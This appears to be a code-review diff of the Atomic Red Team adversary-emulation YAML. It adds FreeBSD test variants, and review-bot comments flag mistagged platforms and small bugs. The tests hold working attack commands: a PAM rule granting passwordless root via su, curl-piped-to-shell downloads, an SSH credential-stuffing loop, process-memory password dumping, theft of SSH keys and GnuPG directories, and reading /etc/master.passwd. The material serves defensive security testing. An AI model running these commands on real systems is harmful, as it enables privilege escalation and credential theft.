auto_generated_guid: 18397d87-38aa-4443-a098-8a48a8ca5d8d
description: 'Use import command from ImageMagick to collect a full desktop
screenshot

'
supported_platforms:
- linux
input_arguments:
output_file:
description: Output file path
type: path
default: "/tmp/T1113_desktop.png"
dependencies:
- description: 'ImageMagick must be installed

'
prereq_command: 'if import -help > /dev/null 2>&1; then exit 0; else exit
1; fi

'
get_prereq_command: 'pkg install -y ImageMagick7

'
executor:
command: 'import -window root #{output_file}

'
cleanup_command: 'rm #{output_file}

'
name: sh
T1557:
technique:
modified: '2023-03-30T21:01:37.568Z'
@@ -52136,6 +53911,39 @@ collection:
tail /var/log/syslog
cleanup_command: 'unset PROMPT_COMMAND

'
- name: Logging sh history to syslog/messages
auto_generated_guid: b04284dc-3bd9-4840-8d21-61b8d31c99f2
description: "There are several variables that can be set to control the appearance
of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents
of these variables are executed as if they had been typed on the command line.
The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable
and can be configured to write the latest \"bash history\" entries to the
syslog.\n\nTo gain persistence the command could be added to the users .shrc
or .profile \n"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'This test requires to be run in a bash shell and that logger
and tee are installed.

'
prereq_command: |
if [ "$(echo $SHELL)" != "/bin/sh" ]; then echo -e "\n***** sh not running! *****\n"; exit 1; fi
if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
get_prereq_command: 'echo ""

'
executor:
name: sh
elevation_required: true
command: |
PS2=`logger -t "$USER" -f ~/.sh_history`
$PS2
tail /var/log/messages
cleanup_command: 'unset PS2

'
- name: Bash session based keylogger
auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258
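Review bot: in the `Logging sh history to syslog/messages` executor, the backticks in ``PS2=`logger -t "$USER" -f ~/.sh_history` `` run logger once at assignment time and store its (empty) stdout in PS2, so the following `$PS2` expands to nothing and no prompt hook is installed; the test logs the history file exactly once and then exits, which is not what the description (copied from the bash PROMPT_COMMAND test, still talking about "bash history" and PROMPT_COMMAND) claims. Either quote the assignment (`PS2='...'`) and describe it as a one-shot logger call, or rewrite the description to say what runs. The dependency text also says "bash shell" and "logger and tee" while the prereq requires `$SHELL` to be /bin/sh and checks only logger.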
@@ -52148,7 +53956,6 @@ collection:
persistence the command could be added to the users .bashrc or .bash_aliases
or the systems default .bashrc in /etc/skel/ \n"
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
@@ -52615,6 +54422,35 @@ collection:

'
name: bash
- name: Stage data from Discovery.sh (freebsd)
auto_generated_guid: 4fca7b49-379d-4493-8890-d6297750fa46
description: 'Utilize curl to download discovery.sh and execute a basic information
gathering shell script

'
supported_platforms:
- linux
input_arguments:
output_file:
description: Location to save downloaded discovery.bat file
type: path
default: "/tmp/T1074.001_discovery.log"
dependency_executor_name: sh
dependencies:
- description: 'Check if curl is installed.

'
prereq_command: 'if [ ! -x "$(command -v curl)" ]; then exit 1; else exit
0; fi;

'
get_prereq_command: "(which pkg && pkg install -y curl)\n"
executor:
command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh
| sh -s > #{output_file}

'
name: sh
T1114.001:
technique:
x_mitre_platforms:
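Review bot: the output_file description still reads "downloaded discovery.bat file" (carried over from the Windows variant) and the test description says `discovery.sh` while the URL fetches `Discovery.sh`; make the names consistent. The only functional difference from the Linux test above it is `| sh -s` in place of bash plus the `pkg` prereq, so the `- linux` tag makes this a near-duplicate on Linux; tag it freebsd.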
@@ -53110,7 +54946,6 @@ collection:

'
supported_platforms:
- freebsd
- linux
input_arguments:
path_to_input_file:
@@ -53147,7 +54982,6 @@ collection:

'
supported_platforms:
- freebsd
- linux
input_arguments:
path_to_input_file:
@@ -53184,7 +55018,6 @@ collection:

'
supported_platforms:
- freebsd
- linux
input_arguments:
path_to_input_file:
@@ -53221,7 +55054,6 @@ collection:

'
supported_platforms:
- freebsd
- linux
input_arguments:
path_to_input_file:
@@ -57023,6 +58855,36 @@ credential-access:
'
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}

'
- name: Malicious PAM rule (freebsd)
auto_generated_guid: b17eacac-282d-4ca8-a240-46602cf863e3
description: |
Inserts a rule into a PAM config and then tests it.

Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
supported_platforms:
- linux
input_arguments:
path_to_pam_conf:
description: PAM config file to modify.
type: string
default: "/etc/pam.d/su"
pam_rule:
description: Rule to add to the PAM config.
type: string
default: auth sufficient pam_succeed_if.so uid >= 0
index:
description: Index where the rule is inserted.
type: integer
default: 8
executor:
name: sh
elevation_required: true
command: 'sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}

'
cleanup_command: 'sudo sed -i "" "/#{pam_rule}/d" #{path_to_pam_conf}

'
- name: Malicious PAM module
auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
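Review bot: the default `pam_rule` names `pam_succeed_if.so`, which is a Linux-PAM module; FreeBSD's base OpenPAM does not ship it, so on the platform this `(freebsd)` variant is written for the rule references a module that does not exist and the test cannot demonstrate what its description says it does. Add a prereq that checks the module file is present (`test -f /usr/lib/pam_succeed_if.so` or wherever the deployment puts it) so the test fails its dependency rather than leaving a dangling rule in `/etc/pam.d/su`. As with the first copy of this test, `sed -i ""` is BSD syntax and the cleanup uses `/` as the regex delimiter; the Linux variant's `"\,#{pam_rule},d"` shown at the top of this hunk is the safer form, and supported_platforms should say freebsd, not linux.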
@@ -57230,6 +59092,39 @@ credential-access:
tail /var/log/syslog
cleanup_command: 'unset PROMPT_COMMAND

'
- name: Logging sh history to syslog/messages
auto_generated_guid: b04284dc-3bd9-4840-8d21-61b8d31c99f2
description: "There are several variables that can be set to control the appearance
of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents
of these variables are executed as if they had been typed on the command line.
The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable
and can be configured to write the latest \"bash history\" entries to the
syslog.\n\nTo gain persistence the command could be added to the users .shrc
or .profile \n"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'This test requires to be run in a bash shell and that logger
and tee are installed.

'
prereq_command: |
if [ "$(echo $SHELL)" != "/bin/sh" ]; then echo -e "\n***** sh not running! *****\n"; exit 1; fi
if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
get_prereq_command: 'echo ""

'
executor:
name: sh
elevation_required: true
command: |
PS2=`logger -t "$USER" -f ~/.sh_history`
$PS2
tail /var/log/messages
cleanup_command: 'unset PS2

'
- name: Bash session based keylogger
auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258
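Review bot: this is the same `Logging sh history to syslog/messages` block (GUID b04284dc-3bd9-4840-8d21-61b8d31c99f2) that the merge also adds under collection, so the PS2 backtick assignment that runs logger once instead of installing a prompt hook, and the bash-vs-sh mismatch between description and prereq, apply here too; whatever fix lands for the collection copy needs to land in both places, or in the source atomic that generates them.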
@@ -57242,7 +59137,6 @@ credential-access:
persistence the command could be added to the users .bashrc or .bash_aliases
or the systems default .bashrc in /etc/skel/ \n"
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
@@ -57505,6 +59399,50 @@ credential-access:
curl -s #{remote_url} |bash
cleanup_command: 'userdel -fr art

'
- name: SUDO Brute Force - FreeBSD
auto_generated_guid: abcde488-e083-4ee7-bc85-a5684edd7541
description: "An adversary may find themselves on a box (e.g. via ssh key auth,
with no password) with a user that has sudo'ers privileges, but they do not
know the users password. Normally, failed attempts to access root will not
cause the root account to become locked, to prevent denial-of-service. This
functionality enables an attacker to undertake a local brute force password
guessing attack without locking out the root user. \n\nThis test creates the
\"art\" user with a password of \"password123\", logs in, downloads and executes
the sudo_bruteforce.sh which brute force guesses the password, then deletes
the user\n"
supported_platforms:
- linux
input_arguments:
remote_url:
description: url of remote payload
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
dependency_executor_name: sh
dependencies:
- description: 'Check if running on a FreeBSD based machine.

'
prereq_command: |
if grep -iq "FreeBSD" /etc/os-release; then echo "FreeBSD"; else echo "NOT FreeBSD"; exit 1; fi
if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
if [ -x "$(command -v bash)" ]; then echo "bash is installed"; else echo "bash is NOT installed"; exit 1; fi
get_prereq_command: 'pkg update && pkg install -y sudo curl bash

'
executor:
name: bash
elevation_required: true
command: |
pw adduser art -g wheel -s /bin/sh
echo "password123" | pw usermod art -h 0
su art
cd /tmp
curl -s #{remote_url} |bash
cleanup_command: 'rmuser -y art

'
T1003:
technique:
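Review bot: `pw adduser art -g wheel -s /bin/sh` is not a pw(8) invocation (the accepted forms are `pw useradd` or `pw user add`; `adduser` is a separate interactive script), so the executor fails on its first line and the brute-force script is never reached; the two later FreeBSD tests in this merge use `pw useradd` correctly. The dependency explicitly checks `grep -iq "FreeBSD" /etc/os-release` and then `pkg install`s the tools, which contradicts `supported_platforms: - linux` two lines above it; tag the test freebsd. This is also the one new FreeBSD test whose prereq checks openssl, yet the executor no longer uses it; drop that check or the dead prereq line.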
@@ -58473,6 +60411,51 @@ credential-access:
|
||||
grep -i "PASS" "#{output_file}"
|
||||
cleanup_command: 'rm -f "#{output_file}"
|
||||
|
||||
'
|
||||
- name: Dump individual process memory with sh on FreeBSD (Local)
|
||||
auto_generated_guid: fa37b633-e097-4415-b2b8-c5bf4c86e423
|
||||
description: |
|
||||
Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
|
||||
copy process memory to an external file so it can be searched or exfiltrated later.
|
||||
On FreeBSD procfs must be mounted.
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Path where captured results will be placed
|
||||
type: path
|
||||
default: "/tmp/T1003.007.bin"
|
||||
script_path:
|
||||
description: Path to script generating the target process
|
||||
type: path
|
||||
default: "/tmp/T1003.007.sh"
|
||||
pid_term:
|
||||
description: Unique string to use to identify target process
|
||||
type: string
|
||||
default: T1003.007
|
||||
dependencies:
|
||||
- description: 'Script to launch target process must exist
|
||||
|
||||
'
|
||||
prereq_command: |
|
||||
test -f #{script_path}
|
||||
grep "#{pid_term}" #{script_path}
|
||||
get_prereq_command: |
|
||||
echo '#!/bin/sh' > #{script_path}
|
||||
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
sh #{script_path}
|
||||
PID=$(pgrep -n -f "#{pid_term}")
|
||||
MEM_START=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f1)
|
||||
MEM_STOP=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f2)
|
||||
MEM_SIZE=$(echo $(($MEM_STOP-$MEM_START)))
|
||||
dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
|
||||
strings "#{output_file}" | grep -i PASS
|
||||
cleanup_command: 'rm -f "#{output_file}"
|
||||
|
||||
'
|
||||
- name: Dump individual process memory with Python (Local)
|
||||
auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
|
||||
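Review bot: the new "Dump individual process memory with sh on FreeBSD" test declares `supported_platforms: - linux`, yet its command parses `/proc/${PID}/map` with space-separated start/end fields (the FreeBSD procfs layout; Linux exposes `maps` with `start-end` ranges), so it is mis-tagged and would fail where it is scheduled. Tag it `freebsd`. Also `MEM_SIZE=$(echo $(($MEM_STOP-$MEM_START)))` can simply be `MEM_SIZE=$((MEM_STOP - MEM_START))`, and `head -n 5 ... | tail -1` takes the fifth mapping without confirming it is the region the description promises; selecting the mapping by its type column would make the capture deterministic.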
@@ -58481,7 +60464,6 @@ credential-access:
|
||||
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
|
||||
On FreeBSD procfs must be mounted.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
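Review bot: the header (7 old lines, 6 new) shows one line being dropped here and the only platform entry that can be it is `- freebsd`, while the kept description still reads "On FreeBSD procfs must be mounted." This is also the first of many hunks in the patch that remove `freebsd` from `supported_platforms` while the FreeBSD tests added elsewhere are tagged `linux`; state the intent (is `freebsd` no longer an accepted platform value, or is this an unintended loss from the merge?) so reviewers can judge both halves of the change together.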
@@ -58780,6 +60762,117 @@ credential-access:
|
||||
tshark -c 5 -i #{interface}
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Packet Capture FreeBSD using tshark or tcpdump
|
||||
auto_generated_guid: c93f2492-9ebe-44b5-8b45-36574cccfe67
|
||||
description: |
|
||||
Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed.
|
||||
|
||||
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
interface:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: string
|
||||
default: em0
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if at least one of tcpdump or tshark is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command
|
||||
-v tshark)" ]; then exit 1; else exit 0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y wireshark-nox11)\n"
|
||||
executor:
|
||||
command: |
|
||||
tcpdump -c 5 -nnni #{interface}
|
||||
tshark -c 5 -i #{interface}
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Packet Capture FreeBSD using /dev/bpfN with sudo
|
||||
auto_generated_guid: e2028771-1bfb-48f5-b5e6-e50ee0942a14
|
||||
description: 'Opens a /dev/bpf file (O_RDONLY) and captures packets for a few
|
||||
seconds.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: string
|
||||
default: em0
|
||||
csource_path:
|
||||
description: Path to C program source
|
||||
type: string
|
||||
default: PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c
|
||||
program_path:
|
||||
description: Path to compiled C program
|
||||
type: string
|
||||
default: "/tmp/t1040_freebsd_pcapdemo"
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'compile C program
|
||||
|
||||
'
|
||||
prereq_command: 'exit 1
|
||||
|
||||
'
|
||||
get_prereq_command: 'cc #{csource_path} -o #{program_path}
|
||||
|
||||
'
|
||||
executor:
|
||||
command: 'sudo #{program_path} -i #{ifname} -t 3
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f #{program_path}
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo
|
||||
auto_generated_guid: a3a0d4c9-c068-4563-a08d-583bd05b884c
|
||||
description: 'Opens a /dev/bpf file (O_RDONLY), sets BPF filter for ''udp''
|
||||
and captures packets for a few seconds.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: string
|
||||
default: em0
|
||||
csource_path:
|
||||
description: Path to C program source
|
||||
type: string
|
||||
default: PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c
|
||||
program_path:
|
||||
description: Path to compiled C program
|
||||
type: string
|
||||
default: "/tmp/t1040_freebsd_pcapdemo"
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'compile C program
|
||||
|
||||
'
|
||||
prereq_command: 'exit 1
|
||||
|
||||
'
|
||||
get_prereq_command: 'cc #{csource_path} -o #{program_path}
|
||||
|
||||
'
|
||||
executor:
|
||||
command: 'sudo #{program_path} -f -i #{ifname} -t 3
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f #{program_path}
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo
|
||||
auto_generated_guid: 10c710c9-9104-4d5f-8829-5b65391e2a29
|
||||
description: 'Captures packets with domain=AF_PACKET, type=SOCK_RAW for a few
|
||||
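Review bot: all three FreeBSD capture tests in this hunk declare `supported_platforms: - linux` while relying on FreeBSD specifics (`pkg install`, the `em0` default, `/dev/bpf`, a binary built from `freebsd_pcapdemo.c`); tag them `freebsd`. In both `/dev/bpfN` tests the dependency's `prereq_command: 'exit 1'` fails unconditionally, so `cc #{csource_path} -o #{program_path}` is recompiled on every run; `test -x #{program_path}` expresses the real prerequisite. The tshark/tcpdump description still says "capture 5 packets on interface ens33" although the default `interface` is `em0`, and `csource_path`/`program_path` are declared `type: string` where the file uses `type: path` for paths.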
@@ -60072,9 +62165,8 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
search_path:
|
||||
description: Path where to start searching from.
|
||||
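Review bot: the counts (9 old, 8 new) together with the two `- macos` lines indicate `- macos` is being moved below `- linux` at the same time `- freebsd` is dropped; if the intent is only to remove FreeBSD, leave `- macos` in place so this hunk (and the same pattern in the later T1552.001 and discovery hunks) does not churn unrelated lines.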
@@ -60116,6 +62208,41 @@ credential-access:
|
||||
exit 0
|
||||
cleanup_command: 'rm -rf #{output_folder}
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Copy Private SSH Keys with CP (freebsd)
|
||||
auto_generated_guid: 12e4a260-a7fd-4ed8-bf18-1a28c1395775
|
||||
description: 'Copy private SSH keys on a FreeBSD system to a staging folder
|
||||
using the `cp` command.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
search_path:
|
||||
description: Path where to start searching from.
|
||||
type: path
|
||||
default: "/"
|
||||
output_folder:
|
||||
description: Output folder containing copies of SSH private key files
|
||||
type: path
|
||||
default: "/tmp/art-staging"
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Install GNU cp from coreutils package.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v gcp)" ]; then exit 1; else exit 0;
|
||||
fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y coreutils)\n"
|
||||
executor:
|
||||
command: |
|
||||
mkdir #{output_folder}
|
||||
find #{search_path} -name id_rsa 2>/dev/null -exec gcp --parents {} #{output_folder} \;
|
||||
cleanup_command: 'rm -rf #{output_folder}
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Copy Private SSH Keys with rsync
|
||||
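Review bot: `mkdir #{output_folder}` (without `-p`) aborts if the staging folder already exists, for example after a run whose cleanup was skipped; use `mkdir -p`. This FreeBSD test is also tagged `supported_platforms: - linux` although its prerequisite installs `gcp` with `pkg install -y coreutils`; tag it `freebsd`.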
@@ -60143,6 +62270,41 @@ credential-access:
|
||||
exit 0
|
||||
cleanup_command: 'rm -rf #{output_folder}
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Copy Private SSH Keys with rsync (freebsd)
|
||||
auto_generated_guid: 922b1080-0b95-42b0-9585-b9a5ea0af044
|
||||
description: 'Copy private SSH keys on a FreeBSD system to a staging folder
|
||||
using the `rsync` command.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
search_path:
|
||||
description: Path where to start searching from.
|
||||
type: path
|
||||
default: "/"
|
||||
output_folder:
|
||||
description: Output folder containing copies of SSH private key files
|
||||
type: path
|
||||
default: "/tmp/art-staging"
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if rsync is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v rsync)" ]; then exit 1; else exit
|
||||
0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y rsync)\n"
|
||||
executor:
|
||||
command: |
|
||||
mkdir #{output_folder}
|
||||
find #{search_path} -name id_rsa 2>/dev/null -exec rsync -R {} #{output_folder} \;
|
||||
cleanup_command: 'rm -rf #{output_folder}
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Copy the users GnuPG directory with rsync
|
||||
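Review bot: same two points as the `cp` variant above: `mkdir #{output_folder}` needs `-p`, and `supported_platforms` should say `freebsd` rather than `linux` given the `pkg install -y rsync` prerequisite.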
@@ -60170,6 +62332,41 @@ credential-access:
|
||||
exit 0
|
||||
cleanup_command: 'rm -rf #{output_folder}
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Copy the users GnuPG directory with rsync (freebsd)
|
||||
auto_generated_guid: b05ac39b-515f-48e9-88e9-2f141b5bcad0
|
||||
description: 'Copy the users GnuPG (.gnupg) directory on a FreeBSD system to
|
||||
a staging folder using the `rsync` command.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
search_path:
|
||||
description: Path where to start searching from
|
||||
type: path
|
||||
default: "/"
|
||||
output_folder:
|
||||
description: Output folder containing a copy of the .gnupg directory
|
||||
type: path
|
||||
default: "/tmp/GnuPG"
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if rsync is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v rsync)" ]; then exit 1; else exit
|
||||
0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y rsync)\n"
|
||||
executor:
|
||||
command: |
|
||||
mkdir #{output_folder}
|
||||
find #{search_path} -type d -name '.gnupg' 2>/dev/null -exec rsync -Rr {} #{output_folder} \;
|
||||
cleanup_command: 'rm -rf #{output_folder}
|
||||
|
||||
'
|
||||
name: sh
|
||||
T1557.001:
|
||||
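Review bot: `supported_platforms: - linux` again mis-tags a FreeBSD test whose dependency is installed with `pkg`, and `mkdir #{output_folder}` without `-p` fails on a pre-existing `/tmp/GnuPG`. Since `find ... -exec rsync -Rr {} #{output_folder} \;` preserves the full source path under the staging folder, the description could say where the copy actually lands.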
@@ -60929,6 +63126,32 @@ credential-access:
|
||||
command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} >
|
||||
#{output_file}
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Search Through sh History
|
||||
auto_generated_guid: d87d3b94-05b4-40f2-a80f-99864ffa6803
|
||||
description: 'Search through sh history for specifice commands we want to capture
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Path where captured results will be placed
|
||||
type: path
|
||||
default: "~/loot.txt"
|
||||
sh_history_grep_args:
|
||||
description: grep arguments that filter out specific commands we want to
|
||||
capture
|
||||
type: path
|
||||
default: "-e '-p ' -e 'pass' -e 'ssh'"
|
||||
sh_history_filename:
|
||||
description: Path of the sh history file to capture
|
||||
type: path
|
||||
default: "~/.history"
|
||||
executor:
|
||||
command: 'cat #{sh_history_filename} | grep #{sh_history_grep_args} > #{output_file}
|
||||
|
||||
'
|
||||
name: sh
|
||||
T1552.001:
|
||||
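Review bot: `sh_history_grep_args` is declared `type: path` but holds grep arguments (`-e '-p ' -e 'pass' -e 'ssh'`); make it `type: string`. The description has a typo ("specifice"), and `cat #{sh_history_filename} | grep ... > #{output_file}` can be `grep #{sh_history_grep_args} #{sh_history_filename} > #{output_file}`. The default `~/.history` is the csh/tcsh history file rather than a POSIX sh one, so confirm that is the file this sh-named test is meant to read.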
@@ -61017,7 +63240,6 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
input_arguments:
|
||||
@@ -61036,9 +63258,8 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: Path to search
|
||||
@@ -61056,9 +63277,8 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: Path to search
|
||||
@@ -62006,6 +64226,37 @@ credential-access:
|
||||
command: |
|
||||
cp "$PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt" /tmp/
|
||||
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
|
||||
- name: SSH Credential Stuffing From FreeBSD
|
||||
auto_generated_guid: a790d50e-7ebf-48de-8daa-d9367e0911d4
|
||||
description: 'Using username,password combination from a password dump to login
|
||||
over SSH.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
target_host:
|
||||
description: IP Address / Hostname you want to target.
|
||||
type: string
|
||||
default: localhost
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Requires SSHPASS
|
||||
|
||||
'
|
||||
prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit
|
||||
1; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: 'pkg install -y sshpass
|
||||
|
||||
'
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: |
|
||||
cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
|
||||
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
|
||||
T1208:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
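Review bot: `cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/` leaves the path unquoted, unlike the Linux test directly above it; quote it so a space in the atomics folder path does not break the copy. `for unamepass in $(cat ...)` also splits on any whitespace, so a credential line containing a space is silently truncated; a `while IFS=: read -r user pass` loop over the file is safer. And this FreeBSD test is tagged `supported_platforms: - linux` although its prerequisite is `pkg install -y sshpass`.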
@@ -62559,11 +64810,29 @@ credential-access:
|
||||
'
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Access /etc/master.passwd (Local)
|
||||
auto_generated_guid: 5076874f-a8e6-4077-8ace-9e5ab54114a5
|
||||
description: "/etc/master.passwd file is accessed in FreeBSD environments\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Path where captured results will be placed
|
||||
type: path
|
||||
default: "/tmp/T1003.008.txt"
|
||||
executor:
|
||||
command: |
|
||||
sudo cat /etc/master.passwd > #{output_file}
|
||||
cat #{output_file}
|
||||
cleanup_command: 'rm -f #{output_file}
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Access /etc/passwd (Local)
|
||||
auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d
|
||||
description: "/etc/passwd file is accessed in FreeBSD and Linux environments\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
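Review bot: `/etc/master.passwd` exists on FreeBSD but not on Linux, yet the new "Access /etc/master.passwd (Local)" test is tagged `supported_platforms: - linux`, so it would be scheduled on hosts where `sudo cat /etc/master.passwd` fails; tag it `freebsd`. `sudo` inside the command also duplicates `elevation_required: true`, which the neighbouring tests rely on instead.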
@@ -62585,7 +64854,6 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -62609,7 +64877,6 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -63692,7 +65959,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will stdout list of usernames.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -64280,7 +66546,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -64299,7 +66564,6 @@ discovery:
|
||||
auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2
|
||||
description: "(requires root)\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -64323,7 +66587,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -64346,7 +66609,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -64395,6 +66657,26 @@ discovery:
|
||||
cat #{output_file}
|
||||
cleanup_command: 'rm -f #{output_file}
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Show if a user account has ever logged in remotely (freebsd)
|
||||
auto_generated_guid: 0f73418f-d680-4383-8a24-87bc97fe4e35
|
||||
description: 'Show if a user account has ever logged in remotely
